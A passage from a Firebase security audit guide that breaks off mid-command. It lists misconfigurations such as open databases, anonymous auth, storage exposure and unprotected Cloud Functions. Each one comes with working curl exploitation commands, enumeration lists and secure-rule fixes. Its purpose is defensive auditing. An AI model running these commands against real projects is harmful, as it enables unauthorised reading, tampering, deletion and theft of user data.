- [ ] Check if `ADMIN_ONLY_OPERATION` error is returned
|
|
62
|
+
- [ ] Verify user creation is restricted to admin SDK
|
|
63
|
+
- [ ] Review if app legitimately needs public signup
|
|
64
|
+
|
|
65
|
+
---
|
|
66
|
+
|
|
67
|
+
## 2. ANONYMOUS AUTHENTICATION ENABLED (High)
|
|
68
|
+
|
|
69
|
+
**The Problem:** Anonymous auth creates real Firebase users with valid tokens, bypassing `auth != null` security rules.
|
|
70
|
+
|
|
71
|
+
**Vulnerable Configuration:**
|
|
72
|
+
```
|
|
73
|
+
Firebase Console → Authentication → Sign-in method → Anonymous: Enabled
|
|
74
|
+
```
|
|
75
|
+
|
|
76
|
+
**Exploitation:**
|
|
77
|
+
```bash
|
|
78
|
+
# Get anonymous auth token
|
|
79
|
+
curl -X POST \
|
|
80
|
+
-H "Content-Type: application/json" \
|
|
81
|
+
-d '{"returnSecureToken":true}' \
|
|
82
|
+
"https://identitytoolkit.googleapis.com/v1/accounts:signUp?key=AIzaXXXXXX"
|
|
83
|
+
```
|
|
84
|
+
|
|
85
|
+
**Successful Attack Response:**
|
|
86
|
+
```json
|
|
87
|
+
{
|
|
88
|
+
"idToken": "eyJhbGciOiJSUzI1NiIs...",
|
|
89
|
+
"refreshToken": "AGEhc0B...",
|
|
90
|
+
"expiresIn": "3600",
|
|
91
|
+
"localId": "anon_user_id_123"
|
|
92
|
+
}
|
|
93
|
+
```
|
|
94
|
+
|
|
95
|
+
**Bypassing "Authenticated Only" Rules:**
|
|
96
|
+
```javascript
|
|
97
|
+
// These rules are BYPASSED by anonymous auth
|
|
98
|
+
{
|
|
99
|
+
"rules": {
|
|
100
|
+
".read": "auth != null", // Anonymous user passes this!
|
|
101
|
+
".write": "auth != null"
|
|
102
|
+
}
|
|
103
|
+
}
|
|
104
|
+
```
|
|
105
|
+
|
|
106
|
+
**Attack with Token:**
|
|
107
|
+
```bash
|
|
108
|
+
# Access "authenticated" resources with anonymous token
|
|
109
|
+
curl "https://PROJECT.firebaseio.com/users.json?auth=eyJhbGciOiJSUzI1NiIs..."
|
|
110
|
+
```
|
|
111
|
+
|
|
112
|
+
**Secure Rules (Require Real Users):**
|
|
113
|
+
```javascript
|
|
114
|
+
{
|
|
115
|
+
"rules": {
|
|
116
|
+
".read": "auth != null && auth.token.email_verified == true",
|
|
117
|
+
".write": "auth != null && auth.provider !== 'anonymous'"
|
|
118
|
+
}
|
|
119
|
+
}
|
|
120
|
+
```
|
|
121
|
+
|
|
122
|
+
**Audit Checklist:**
|
|
123
|
+
- [ ] Test anonymous signup endpoint
|
|
124
|
+
- [ ] If token returned, test database/storage access with it
|
|
125
|
+
- [ ] Check if security rules distinguish anonymous vs real users
|
|
126
|
+
- [ ] Verify business need for anonymous authentication
|
|
127
|
+
|
|
128
|
+
---
|
|
129
|
+
|
|
130
|
+
## 3. EMAIL ENUMERATION (Medium)
|
|
131
|
+
|
|
132
|
+
**The Problem:** The `createAuthUri` endpoint reveals whether an email is registered.
|
|
133
|
+
|
|
134
|
+
**Vulnerable Response:**
|
|
135
|
+
```bash
|
|
136
|
+
curl -X POST \
|
|
137
|
+
-H "Content-Type: application/json" \
|
|
138
|
+
-d '{"identifier":"victim@company.com","continueUri":"https://localhost"}' \
|
|
139
|
+
"https://identitytoolkit.googleapis.com/v1/accounts:createAuthUri?key=AIzaXXXXXX"
|
|
140
|
+
```
|
|
141
|
+
|
|
142
|
+
**Information Disclosure Response:**
|
|
143
|
+
```json
|
|
144
|
+
{
|
|
145
|
+
"kind": "identitytoolkit#CreateAuthUriResponse",
|
|
146
|
+
"registered": true, // LEAKS registration status
|
|
147
|
+
"sessionId": "...",
|
|
148
|
+
"signinMethods": ["password"] // LEAKS auth methods
|
|
149
|
+
}
|
|
150
|
+
```
|
|
151
|
+
|
|
152
|
+
**Impact:**
|
|
153
|
+
- User enumeration for targeted attacks
|
|
154
|
+
- Credential stuffing reconnaissance
|
|
155
|
+
- Social engineering intelligence
|
|
156
|
+
|
|
157
|
+
**Secure Configuration:**
|
|
158
|
+
```
|
|
159
|
+
Firebase Console → Authentication → Settings → User enumeration protection: Enabled
|
|
160
|
+
```
|
|
161
|
+
|
|
162
|
+
**Audit Checklist:**
|
|
163
|
+
- [ ] Test `createAuthUri` with known and unknown emails
|
|
164
|
+
- [ ] Check if `registered` field varies between existing/non-existing users
|
|
165
|
+
- [ ] Verify email enumeration protection is enabled
|
|
166
|
+
|
|
167
|
+
---
|
|
168
|
+
|
|
169
|
+
## 4. REALTIME DATABASE UNAUTHENTICATED READ (Critical)
|
|
170
|
+
|
|
171
|
+
**The Problem:** Database rules allow public read access to all data.
|
|
172
|
+
|
|
173
|
+
**Vulnerable Rules:**
|
|
174
|
+
```json
|
|
175
|
+
{
|
|
176
|
+
"rules": {
|
|
177
|
+
".read": true,
|
|
178
|
+
".write": false
|
|
179
|
+
}
|
|
180
|
+
}
|
|
181
|
+
```
|
|
182
|
+
|
|
183
|
+
**Exploitation:**
|
|
184
|
+
```bash
|
|
185
|
+
# Read entire database
|
|
186
|
+
curl "https://PROJECT-ID.firebaseio.com/.json"
|
|
187
|
+
|
|
188
|
+
# Read with shallow query (shows structure even if full read denied)
|
|
189
|
+
curl "https://PROJECT-ID.firebaseio.com/.json?shallow=true"
|
|
190
|
+
|
|
191
|
+
# Read specific paths
|
|
192
|
+
curl "https://PROJECT-ID.firebaseio.com/users.json"
|
|
193
|
+
curl "https://PROJECT-ID.firebaseio.com/messages.json"
|
|
194
|
+
curl "https://PROJECT-ID.firebaseio.com/orders.json"
|
|
195
|
+
```
|
|
196
|
+
|
|
197
|
+
**Data Exposure Response:**
|
|
198
|
+
```json
|
|
199
|
+
{
|
|
200
|
+
"users": {
|
|
201
|
+
"user123": {
|
|
202
|
+
"email": "john@example.com",
|
|
203
|
+
"phone": "+1234567890",
|
|
204
|
+
"address": "123 Main St"
|
|
205
|
+
}
|
|
206
|
+
},
|
|
207
|
+
"api_keys": {
|
|
208
|
+
"stripe": "sk_live_XXXX",
|
|
209
|
+
"twilio": "ACXXXX"
|
|
210
|
+
}
|
|
211
|
+
}
|
|
212
|
+
```
|
|
213
|
+
|
|
214
|
+
**Secure Rules:**
|
|
215
|
+
```json
|
|
216
|
+
{
|
|
217
|
+
"rules": {
|
|
218
|
+
".read": false,
|
|
219
|
+
".write": false,
|
|
220
|
+
"users": {
|
|
221
|
+
"$uid": {
|
|
222
|
+
".read": "$uid === auth.uid",
|
|
223
|
+
".write": "$uid === auth.uid"
|
|
224
|
+
}
|
|
225
|
+
},
|
|
226
|
+
"public": {
|
|
227
|
+
".read": true,
|
|
228
|
+
".write": false
|
|
229
|
+
}
|
|
230
|
+
}
|
|
231
|
+
}
|
|
232
|
+
```
|
|
233
|
+
|
|
234
|
+
**Audit Checklist:**
|
|
235
|
+
- [ ] Test root read: `/.json`
|
|
236
|
+
- [ ] Test shallow query: `/.json?shallow=true`
|
|
237
|
+
- [ ] Enumerate common paths: users, messages, orders, config, admin
|
|
238
|
+
- [ ] Check for sensitive data exposure (PII, API keys, tokens)
|
|
239
|
+
|
|
240
|
+
---
|
|
241
|
+
|
|
242
|
+
## 5. REALTIME DATABASE UNAUTHENTICATED WRITE (Critical)
|
|
243
|
+
|
|
244
|
+
**The Problem:** Database rules allow public write access, enabling data manipulation or injection.
|
|
245
|
+
|
|
246
|
+
**Vulnerable Rules:**
|
|
247
|
+
```json
|
|
248
|
+
{
|
|
249
|
+
"rules": {
|
|
250
|
+
".read": false,
|
|
251
|
+
".write": true // CRITICAL VULNERABILITY
|
|
252
|
+
}
|
|
253
|
+
}
|
|
254
|
+
```
|
|
255
|
+
|
|
256
|
+
**Exploitation:**
|
|
257
|
+
```bash
|
|
258
|
+
# Write arbitrary data
|
|
259
|
+
curl -X PUT \
|
|
260
|
+
-H "Content-Type: application/json" \
|
|
261
|
+
-d '{"attacker":"was_here","timestamp":1234567890}' \
|
|
262
|
+
"https://PROJECT-ID.firebaseio.com/pwned.json"
|
|
263
|
+
|
|
264
|
+
# Overwrite existing data
|
|
265
|
+
curl -X PUT \
|
|
266
|
+
-H "Content-Type: application/json" \
|
|
267
|
+
-d '{"role":"admin"}' \
|
|
268
|
+
"https://PROJECT-ID.firebaseio.com/users/victim_uid/profile.json"
|
|
269
|
+
|
|
270
|
+
# Delete data
|
|
271
|
+
curl -X DELETE "https://PROJECT-ID.firebaseio.com/important_data.json"
|
|
272
|
+
```
|
|
273
|
+
|
|
274
|
+
**Impact:**
|
|
275
|
+
- Data tampering and corruption
|
|
276
|
+
- Privilege escalation (modify user roles)
|
|
277
|
+
- Inject malicious content
|
|
278
|
+
- Delete critical data
|
|
279
|
+
- Store illegal content
|
|
280
|
+
|
|
281
|
+
**Secure Rules:**
|
|
282
|
+
```json
|
|
283
|
+
{
|
|
284
|
+
"rules": {
|
|
285
|
+
".write": false,
|
|
286
|
+
"user_content": {
|
|
287
|
+
"$uid": {
|
|
288
|
+
".write": "$uid === auth.uid",
|
|
289
|
+
".validate": "newData.hasChildren(['title', 'body']) && newData.child('title').isString()"
|
|
290
|
+
}
|
|
291
|
+
}
|
|
292
|
+
}
|
|
293
|
+
}
|
|
294
|
+
```
|
|
295
|
+
|
|
296
|
+
**Audit Checklist:**
|
|
297
|
+
- [ ] Test write to test path: `/_security_test.json`
|
|
298
|
+
- [ ] Attempt to modify existing data paths
|
|
299
|
+
- [ ] Check if validation rules exist
|
|
300
|
+
- [ ] Clean up any test data written
|
|
301
|
+
|
|
302
|
+
---
|
|
303
|
+
|
|
304
|
+
## 6. FIRESTORE OPEN DOCUMENT ACCESS (Critical)
|
|
305
|
+
|
|
306
|
+
**The Problem:** Firestore security rules allow public access to collections.
|
|
307
|
+
|
|
308
|
+
**Vulnerable Rules:**
|
|
309
|
+
```javascript
|
|
310
|
+
rules_version = '2';
|
|
311
|
+
service cloud.firestore {
|
|
312
|
+
match /databases/{database}/documents {
|
|
313
|
+
match /{document=**} {
|
|
314
|
+
allow read, write: if true; // OPEN TO EVERYONE
|
|
315
|
+
}
|
|
316
|
+
}
|
|
317
|
+
}
|
|
318
|
+
```
|
|
319
|
+
|
|
320
|
+
**Exploitation:**
|
|
321
|
+
```bash
|
|
322
|
+
# List root collections
|
|
323
|
+
curl "https://firestore.googleapis.com/v1/projects/PROJECT-ID/databases/(default)/documents"
|
|
324
|
+
|
|
325
|
+
# Read specific collection
|
|
326
|
+
curl "https://firestore.googleapis.com/v1/projects/PROJECT-ID/databases/(default)/documents/users"
|
|
327
|
+
|
|
328
|
+
# Read specific document
|
|
329
|
+
curl "https://firestore.googleapis.com/v1/projects/PROJECT-ID/databases/(default)/documents/users/admin"
|
|
330
|
+
```
|
|
331
|
+
|
|
332
|
+
**Write Attack:**
|
|
333
|
+
```bash
|
|
334
|
+
# Create document
|
|
335
|
+
curl -X POST \
|
|
336
|
+
-H "Content-Type: application/json" \
|
|
337
|
+
-d '{"fields":{"role":{"stringValue":"admin"},"injected":{"booleanValue":true}}}' \
|
|
338
|
+
"https://firestore.googleapis.com/v1/projects/PROJECT-ID/databases/(default)/documents/users"
|
|
339
|
+
```
|
|
340
|
+
|
|
341
|
+
**Common Sensitive Collections to Test:**
|
|
342
|
+
```
|
|
343
|
+
users, accounts, profiles, members, customers, clients,
|
|
344
|
+
orders, transactions, payments, invoices, billing,
|
|
345
|
+
messages, chats, conversations, notifications,
|
|
346
|
+
settings, config, admin, secrets, tokens, api_keys,
|
|
347
|
+
sessions, credentials, passwords, logs, audit
|
|
348
|
+
```
|
|
349
|
+
|
|
350
|
+
**Secure Rules:**
|
|
351
|
+
```javascript
|
|
352
|
+
rules_version = '2';
|
|
353
|
+
service cloud.firestore {
|
|
354
|
+
match /databases/{database}/documents {
|
|
355
|
+
// Deny all by default
|
|
356
|
+
match /{document=**} {
|
|
357
|
+
allow read, write: if false;
|
|
358
|
+
}
|
|
359
|
+
|
|
360
|
+
// User-specific access
|
|
361
|
+
match /users/{userId} {
|
|
362
|
+
allow read, write: if request.auth != null && request.auth.uid == userId;
|
|
363
|
+
}
|
|
364
|
+
|
|
365
|
+
// Public read, authenticated write
|
|
366
|
+
match /public/{docId} {
|
|
367
|
+
allow read: if true;
|
|
368
|
+
allow write: if request.auth != null;
|
|
369
|
+
}
|
|
370
|
+
}
|
|
371
|
+
}
|
|
372
|
+
```
|
|
373
|
+
|
|
374
|
+
**Audit Checklist:**
|
|
375
|
+
- [ ] Test root document listing
|
|
376
|
+
- [ ] Enumerate common collection names
|
|
377
|
+
- [ ] Test write access to collections
|
|
378
|
+
- [ ] Check for PII and sensitive data exposure
|
|
379
|
+
- [ ] Verify rules use `request.auth.uid` for user data
|
|
380
|
+
|
|
381
|
+
---
|
|
382
|
+
|
|
383
|
+
## 7. FIREBASE STORAGE BUCKET LISTING (High)
|
|
384
|
+
|
|
385
|
+
**The Problem:** Storage rules allow listing bucket contents, exposing all stored files.
|
|
386
|
+
|
|
387
|
+
**Vulnerable Rules:**
|
|
388
|
+
```javascript
|
|
389
|
+
rules_version = '2';
|
|
390
|
+
service firebase.storage {
|
|
391
|
+
match /b/{bucket}/o {
|
|
392
|
+
match /{allPaths=**} {
|
|
393
|
+
allow read, write: if true;
|
|
394
|
+
}
|
|
395
|
+
}
|
|
396
|
+
}
|
|
397
|
+
```
|
|
398
|
+
|
|
399
|
+
**Exploitation:**
|
|
400
|
+
```bash
|
|
401
|
+
# List all files in bucket
|
|
402
|
+
curl "https://firebasestorage.googleapis.com/v0/b/PROJECT-ID.appspot.com/o"
|
|
403
|
+
|
|
404
|
+
# Alternative: gs:// format bucket
|
|
405
|
+
curl "https://firebasestorage.googleapis.com/v0/b/PROJECT-ID/o"
|
|
406
|
+
```
|
|
407
|
+
|
|
408
|
+
**Exposed Files Response:**
|
|
409
|
+
```json
|
|
410
|
+
{
|
|
411
|
+
"items": [
|
|
412
|
+
{
|
|
413
|
+
"name": "user_uploads/private_document.pdf",
|
|
414
|
+
"bucket": "project-id.appspot.com",
|
|
415
|
+
"contentType": "application/pdf",
|
|
416
|
+
"size": "1048576",
|
|
417
|
+
"downloadTokens": "abc123"
|
|
418
|
+
},
|
|
419
|
+
{
|
|
420
|
+
"name": "backups/database_dump_2024.sql",
|
|
421
|
+
"bucket": "project-id.appspot.com"
|
|
422
|
+
}
|
|
423
|
+
]
|
|
424
|
+
}
|
|
425
|
+
```
|
|
426
|
+
|
|
427
|
+
**Download Exposed Files:**
|
|
428
|
+
```bash
|
|
429
|
+
# Download using the file path
|
|
430
|
+
curl "https://firebasestorage.googleapis.com/v0/b/PROJECT-ID.appspot.com/o/user_uploads%2Fprivate_document.pdf?alt=media"
|
|
431
|
+
```
|
|
432
|
+
|
|
433
|
+
**Impact:**
|
|
434
|
+
- Exposure of user-uploaded content
|
|
435
|
+
- Access to backup files
|
|
436
|
+
- Private documents, images, videos leaked
|
|
437
|
+
- Potential credential/key exposure in uploaded files
|
|
438
|
+
|
|
439
|
+
**Secure Rules:**
|
|
440
|
+
```javascript
|
|
441
|
+
rules_version = '2';
|
|
442
|
+
service firebase.storage {
|
|
443
|
+
match /b/{bucket}/o {
|
|
444
|
+
// Deny listing by default
|
|
445
|
+
match /{allPaths=**} {
|
|
446
|
+
allow read, write: if false;
|
|
447
|
+
}
|
|
448
|
+
|
|
449
|
+
// User-specific folders
|
|
450
|
+
match /users/{userId}/{allPaths=**} {
|
|
451
|
+
allow read, write: if request.auth != null && request.auth.uid == userId;
|
|
452
|
+
}
|
|
453
|
+
|
|
454
|
+
// Public assets (no listing)
|
|
455
|
+
match /public/{fileId} {
|
|
456
|
+
allow read: if true;
|
|
457
|
+
allow write: if request.auth != null;
|
|
458
|
+
}
|
|
459
|
+
}
|
|
460
|
+
}
|
|
461
|
+
```
|
|
462
|
+
|
|
463
|
+
**Audit Checklist:**
|
|
464
|
+
- [ ] Test bucket listing endpoint
|
|
465
|
+
- [ ] Check both `.appspot.com` and raw bucket names
|
|
466
|
+
- [ ] Look for sensitive file types (sql, pdf, json, env)
|
|
467
|
+
- [ ] Attempt to download exposed files
|
|
468
|
+
- [ ] Check for backup or admin directories
|
|
469
|
+
|
|
470
|
+
---
|
|
471
|
+
|
|
472
|
+
## 8. FIREBASE STORAGE UNAUTHENTICATED UPLOAD (Critical)
|
|
473
|
+
|
|
474
|
+
**The Problem:** Anyone can upload files to the storage bucket.
|
|
475
|
+
|
|
476
|
+
**Exploitation:**
|
|
477
|
+
```bash
|
|
478
|
+
# Upload arbitrary file
|
|
479
|
+
curl -X POST \
|
|
480
|
+
-H "Content-Type: text/plain" \
|
|
481
|
+
--data-binary "malicious content here" \
|
|
482
|
+
"https://firebasestorage.googleapis.com/v0/b/PROJECT-ID.appspot.com/o?uploadType=media&name=pwned.txt"
|
|
483
|
+
```
|
|
484
|
+
|
|
485
|
+
**Impact:**
|
|
486
|
+
- Storage quota exhaustion (billing attack)
|
|
487
|
+
- Malware hosting
|
|
488
|
+
- Phishing page hosting
|
|
489
|
+
- Illegal content storage (legal liability)
|
|
490
|
+
- Overwrite existing files
|
|
491
|
+
|
|
492
|
+
**Secure Rules with Validation:**
|
|
493
|
+
```javascript
|
|
494
|
+
rules_version = '2';
|
|
495
|
+
service firebase.storage {
|
|
496
|
+
match /b/{bucket}/o {
|
|
497
|
+
match /user_uploads/{userId}/{fileName} {
|
|
498
|
+
allow write: if request.auth != null
|
|
499
|
+
&& request.auth.uid == userId
|
|
500
|
+
&& request.resource.size < 5 * 1024 * 1024 // 5MB limit
|
|
501
|
+
&& request.resource.contentType.matches('image/.*'); // Images only
|
|
502
|
+
}
|
|
503
|
+
}
|
|
504
|
+
}
|
|
505
|
+
```
|
|
506
|
+
|
|
507
|
+
**Audit Checklist:**
|
|
508
|
+
- [ ] Test file upload to various paths
|
|
509
|
+
- [ ] Check if content type restrictions exist
|
|
510
|
+
- [ ] Verify file size limits
|
|
511
|
+
- [ ] Test overwriting existing files
|
|
512
|
+
- [ ] Clean up any uploaded test files
|
|
513
|
+
|
|
514
|
+
---
|
|
515
|
+
|
|
516
|
+
## 9. CLOUD FUNCTIONS UNAUTHENTICATED ACCESS (Medium-High)
|
|
517
|
+
|
|
518
|
+
**The Problem:** HTTP-triggered Cloud Functions accessible without authentication.
|
|
519
|
+
|
|
520
|
+
**Vulnerable Function:**
|
|
521
|
+
```javascript
|
|
522
|
+
// No auth check - anyone can call
|
|
523
|
+
exports.processPayment = functions.https.onRequest((req, res) => {
|
|
524
|
+
const { userId, amount } = req.body;
|
|
525
|
+
// Process payment without verifying caller
|
|
526
|
+
processPayment(userId, amount);
|
|
527
|
+
res.send({ success: true });
|
|
528
|
+
});
|
|
529
|
+
```
|
|
530
|
+
|
|
531
|
+
**Exploitation:**
|
|
532
|
+
```bash
|
|
533
|
+
# Call unprotected function
|
|
534
|
+
curl -X POST \
|
|
535
|
+
-H "Content-Type: application/json" \
|
|
536
|
+
-d '{"userId":"victim123","amount":0.01}' \
|
|
537
|
+
"https://us-central1-PROJECT-ID.cloudfunctions.net/processPayment"
|
|
538
|
+
|
|
539
|
+
# Test callable function
|
|
540
|
+
curl -X POST \
|
|
541
|
+
-H "Content-Type: application/json" \
|
|
542
|
+
-d '{"data":{}}' \
|
|
543
|
+
"https://us-central1-PROJECT-ID.cloudfunctions.net/adminFunction"
|
|
544
|
+
```
|
|
545
|
+
|
|
546
|
+
**Common Function Names to Enumerate:**
|
|
547
|
+
```
|
|
548
|
+
login, logout, register, signup, authenticate, verify,
|
|
549
|
+
createUser, deleteUser, updateUser, getUser, getUsers,
|
|
550
|
+
processPayment, createOrder, sendEmail, sendNotification,
|
|
551
|
+
uploadFile, generateToken, validateToken, refreshToken,
|
|
552
|
+
getData, setData, syncData, backup, restore, export,
|
|
553
|
+
webhook, callback, api, admin, debug, test, healthcheck
|
|
554
|
+
```
|
|
555
|
+
|
|
556
|
+
**Regions to Test:**
|
|
557
|
+
```
|
|
558
|
+
us-central1, us-east1, us-east4, us-west1,
|
|
559
|
+
europe-west1, europe-west2, europe-west3,
|
|
560
|
+
asia-east1, asia-east2, asia-northeast1, asia-south1
|
|
561
|
+
```
|
|
562
|
+
|
|
563
|
+
**Secure Function:**
|
|
564
|
+
```javascript
|
|
565
|
+
exports.processPayment = functions.https.onCall(async (data, context) => {
|
|
566
|
+
// Verify authentication
|
|
567
|
+
if (!context.auth) {
|
|
568
|
+
throw new functions.https.HttpsError('unauthenticated', 'Must be logged in');
|
|
569
|
+
}
|
|
570
|
+
|
|
571
|
+
// Verify authorization
|
|
572
|
+
if (context.auth.uid !== data.userId) {
|
|
573
|
+
throw new functions.https.HttpsError('permission-denied', 'Cannot process for other users');
|
|
574
|
+
}
|
|
575
|
+
|
|
576
|
+
// Process payment
|
|
577
|
+
return processPayment(context.auth.uid, data.amount);
|
|
578
|
+
});
|
|
579
|
+
```
|
|
580
|
+
|
|
581
|
+
**Audit Checklist:**
|
|
582
|
+
- [ ] Enumerate function names from APK strings
|
|
583
|
+
- [ ] Test each function with GET and POST
|
|
584
|
+
- [ ] Check response codes: 404=doesn't exist, 401/403=exists+protected, 200=accessible
|
|
585
|
+
- [ ] Test callable functions with `{"data":{}}` payload
|
|
586
|
+
- [ ] Try multiple regions
|
|
587
|
+
|
|
588
|
+
---
|
|
589
|
+
|
|
590
|
+
## 10. REMOTE CONFIG PUBLIC EXPOSURE (Medium)
|
|
591
|
+
|
|
592
|
+
**The Problem:** Firebase Remote Config parameters accessible with just the API key.
|
|
593
|
+
|
|
594
|
+
**Exploitation:**
|
|
595
|
+
```bash
|
|
596
|
+
curl -H "x-goog-api-key: AIzaXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" \
|
|
597
|
+
"https://firebaseremoteconfig.googleapis.com/v1/projects/PROJECT-ID/remoteConfig"
|
|
598
|
+
```
|
|
599
|
+
|
|
600
|
+
**Exposed Configuration Response:**
|
|
601
|
+
```json
|
|
602
|
+
{
|
|
603
|
+
"parameters": {
|
|
604
|
+
"api_endpoint": {
|
|
605
|
+
"defaultValue": { "value": "https://internal-api.company.com" }
|
|
606
|
+
},
|
|
607
|
+
"feature_flags": {
|
|
608
|
+
"defaultValue": { "value": "{\"admin_panel\":true,\"debug_mode\":true}" }
|
|
609
|
+
},
|
|
610
|
+
"third_party_keys": {
|
|
611
|
+
"defaultValue": { "value": "sk_live_XXXXXXXX" }
|
|
612
|
+
}
|
|
613
|
+
}
|
|
614
|
+
}
|
|
615
|
+
```
|
|
616
|
+
|
|
617
|
+
**Impact:**
|
|
618
|
+
- Internal API endpoint discovery
|
|
619
|
+
- Feature flag enumeration
|
|
620
|
+
- Hardcoded secrets exposure
|
|
621
|
+
- Business logic revelation
|
|
622
|
+
|
|
623
|
+
**Secure Practice:**
|
|
624
|
+
```javascript
|
|
625
|
+
// Don't store secrets in Remote Config
|
|
626
|
+
// Use Secret Manager or server-side configuration
|
|
627
|
+
|
|
628
|
+
// Set conditions for sensitive parameters
|
|
629
|
+
{
|
|
630
|
+
"parameters": {
|
|
631
|
+
"debug_mode": {
|
|
632
|
+
"defaultValue": { "value": "false" },
|
|
633
|
+
"conditionalValues": {
|
|
634
|
+
"internal_testers": { "value": "true" }
|
|
635
|
+
}
|
|
636
|
+
}
|
|
637
|
+
}
|
|
638
|
+
}
|
|
639
|
+
```
|
|
640
|
+
|
|
641
|
+
**Audit Checklist:**
|
|
642
|
+
- [ ] Test Remote Config endpoint with API key
|
|
643
|
+
- [ ] Look for hardcoded secrets in parameters
|
|
644
|
+
- [ ] Check for internal URLs or endpoints
|
|
645
|
+
- [ ] Review feature flags for security implications
|
|
646
|
+
|
|
647
|
+
---
|
|
648
|
+
|
|
649
|
+
## 11. INSECURE SECURITY RULES PATTERNS
|
|
650
|
+
|
|
651
|
+
**The Problem:** Common mistakes in Firebase security rules that appear secure but aren't.
|
|
652
|
+
|
|
653
|
+
**Pattern 1: Trusting Client Data**
|
|
654
|
+
```javascript
|
|
655
|
+
// VULNERABLE - client controls isAdmin field
|
|
656
|
+
match /users/{userId} {
|
|
657
|
+
allow write: if request.resource.data.isAdmin == false;
|
|
658
|
+
}
|
|
659
|
+
// Attack: Set isAdmin=false initially, then update to true
|
|
660
|
+
```
|
|
661
|
+
|
|
662
|
+
**Pattern 2: Missing Validation**
|
|
663
|
+
```javascript
|
|
664
|
+
// VULNERABLE - no field validation
|
|
665
|
+
match /posts/{postId} {
|
|
666
|
+
allow create: if request.auth != null;
|
|
667
|
+
}
|
|
668
|
+
// Attack: Create posts with arbitrary fields, including admin flags
|
|
669
|
+
```
|
|
670
|
+
|
|
671
|
+
**Pattern 3: Overly Broad Wildcards**
|
|
672
|
+
```javascript
|
|
673
|
+
// VULNERABLE - matches ANY path
|
|
674
|
+
match /{document=**} {
|
|
675
|
+
allow read: if request.auth != null;
|
|
676
|
+
}
|
|
677
|
+
// Problem: Authenticated users can read ALL data
|
|
678
|
+
```
|
|
679
|
+
|
|
680
|
+
**Pattern 4: Time-Based Rules Without Server Time**
|
|
681
|
+
```javascript
|
|
682
|
+
// VULNERABLE - client can manipulate timestamp
|
|
683
|
+
match /events/{eventId} {
|
|
684
|
+
allow read: if resource.data.publishDate <= request.time;
|
|
685
|
+
}
|
|
686
|
+
// Attack: Client clock manipulation
|
|
687
|
+
```
|
|
688
|
+
|
|
689
|
+
**Secure Patterns:**
|
|
690
|
+
```javascript
|
|
691
|
+
rules_version = '2';
|
|
692
|
+
service cloud.firestore {
|
|
693
|
+
match /databases/{database}/documents {
|
|
694
|
+
|
|
695
|
+
// Function to check admin status from a trusted source
|
|
696
|
+
function isAdmin() {
|
|
697
|
+
return get(/databases/$(database)/documents/admins/$(request.auth.uid)).data.isAdmin == true;
|
|
698
|
+
}
|
|
699
|
+
|
|
700
|
+
// Validate all required fields
|
|
701
|
+
function isValidPost() {
|
|
702
|
+
return request.resource.data.keys().hasAll(['title', 'content', 'authorId'])
|
|
703
|
+
&& request.resource.data.authorId == request.auth.uid
|
|
704
|
+
&& request.resource.data.title is string
|
|
705
|
+
&& request.resource.data.title.size() <= 200;
|
|
706
|
+
}
|
|
707
|
+
|
|
708
|
+
match /posts/{postId} {
|
|
709
|
+
allow create: if request.auth != null && isValidPost();
|
|
710
|
+
allow update: if request.auth.uid == resource.data.authorId;
|
|
711
|
+
allow delete: if request.auth.uid == resource.data.authorId || isAdmin();
|
|
712
|
+
}
|
|
713
|
+
}
|
|
714
|
+
}
|
|
715
|
+
```
|
|
716
|
+
|
|
717
|
+
**Audit Checklist:**
|
|
718
|
+
- [ ] Review rules for client-controlled privilege escalation
|
|
719
|
+
- [ ] Check for field validation on writes
|
|
720
|
+
- [ ] Verify wildcards don't grant excessive access
|
|
721
|
+
- [ ] Look for timestamp manipulation vulnerabilities
|
|
722
|
+
- [ ] Test boundary conditions in rules
|
|
723
|
+
|
|
724
|
+
---
|
|
725
|
+
|
|
726
|
+
## 12. API KEY EXPOSURE AND MISUSE
|
|
727
|
+
|
|
728
|
+
**The Problem:** Firebase API keys extracted from APKs can be used for various attacks.
|
|
729
|
+
|
|
730
|
+
**Extraction Locations:**
|
|
731
|
+
```
|
|
732
|
+
google-services.json → client[].api_key[].current_key
|
|
733
|
+
res/values/strings.xml → google_api_key, firebase_api_key
|
|
734
|
+
assets/*.json → apiKey, api_key
|
|
735
|
+
Smali code → const-string with "AIza"
|
|
736
|
+
Raw DEX strings → strings command output
|
|
737
|
+
```
|
|
738
|
+
|
|
739
|
+
**API Key Format:**
|
|
740
|
+
```
|
|
741
|
+
AIza[A-Za-z0-9_-]{35}
|
|
742
|
+
Example: AIzaSyA1B2C3D4E5F6G7H8I9J0K1L2M3N4O5P6Q
|
|
743
|
+
```
|
|
744
|
+
|
|
745
|
+
**What Attackers Can Do With API Key:**
|
|
746
|
+
| API | Risk | Mitigation |
|
|
747
|
+
|-----|------|------------|
|
|
748
|
+
| Identity Toolkit | Account creation, enumeration | Restrict signup, enable protections |
|
|
749
|
+
| Realtime Database | Read/write if rules allow | Proper security rules |
|
|
750
|
+
| Firestore | Read/write if rules allow | Proper security rules |
|
|
751
|
+
| Storage | Read/write if rules allow | Proper security rules |
|
|
752
|
+
| Remote Config | Read config parameters | Don't store secrets |
|
|
753
|
+
| Cloud Messaging | Send push notifications | Use server keys server-side only |
|
|
754
|
+
|
|
755
|
+
**Secure Practices:**
|
|
756
|
+
```
|
|
757
|
+
Firebase Console → Project Settings → API Keys:
|
|
758
|
+
1. Restrict Android key to your app's SHA-1 fingerprint
|
|
759
|
+
2. Restrict iOS key to your app's bundle ID
|
|
760
|
+
3. Use separate keys for different environments
|
|
761
|
+
4. Monitor key usage in Cloud Console
|
|
762
|
+
5. Never use server/admin keys in client apps
|
|
763
|
+
```
|
|
764
|
+
|
|
765
|
+
**Audit Checklist:**
|
|
766
|
+
- [ ] Extract all API keys from APK
|
|
767
|
+
- [ ] Test each key against Firebase APIs
|
|
768
|
+
- [ ] Check if keys are properly restricted
|
|
769
|
+
- [ ] Look for server keys accidentally included
|
|
770
|
+
- [ ] Verify keys aren't reused across projects
|
|
771
|
+
|
|
772
|
+
---
|
|
773
|
+
|
|
774
|
+
## Quick Reference: Testing Commands
|
|
775
|
+
|
|
776
|
+
```bash
|
|
777
|
+
# Authentication Tests
|
|
778
|
+
curl -X POST -H "Content-Type: application/json" \
|
|
779
|
+
-d '{"email":"test@test.com","password":"Test123!","returnSecureToken":true}' \
|
|
780
|
+
"https://identitytoolkit.googleapis.com/v1/accounts:signUp?key=API_KEY"
|
|
781
|
+
|
|
782
|
+
# Anonymous Auth
|
|
783
|
+
curl -X POST -H "Content-Type: application/json" \
|
|
784
|
+
-d '{"returnSecureToken":true}' \
|
|
785
|
+
